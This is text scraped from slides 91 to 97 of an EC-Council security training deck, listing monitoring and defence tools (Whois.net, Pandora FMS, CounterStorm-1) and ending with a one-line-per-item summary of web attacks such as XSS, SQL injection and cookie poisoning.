  • 91. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited http://www.whois.net/ Whois.net is an online tool for gaining information about any site
  • 92. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Pandora FMS http://pandorafms.org/ Pandora FMS is a monitoring Open Source software • It watches your systems and applications • It allows you to know the status of any element of those systems Features • Defacement in the website • If the network’s interface is down • Memory leak in the server application Pandora FMS detects :
  • 93. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Pandora FMS: Screenshot
  • 94. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited CounterStorm-1: Defense Against Known, Zero Day, and Targeted Attacks The CounterStorm-1 suite of network security appliances offers the most effective defense against known, Zero Day, and Targeted Attacks It automatically neutralizes attacks within seconds, preventing costly and widespread damage It does not require signatures, CounterStorm-1 accurately detects attacks in all IP-traffic (TCP, UDP, and ICMP) It recognizes current attacks and automatically adjusts to future threats http://www.counterstorm.com
  • 95. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Summary Cross Site Scripting (XSS or CSS) is considered as an application layer hacking technique SQL Injection means passing SQL code into an application that was not created by the developer Cookie Poisoning is the process of tampering with the value of cookies The source, nature, and time of the attack can be determined by analyzing log files of the compromised system FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server Web page defacement requires write access privileges in web server root directory Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity
  • 96. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 97. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited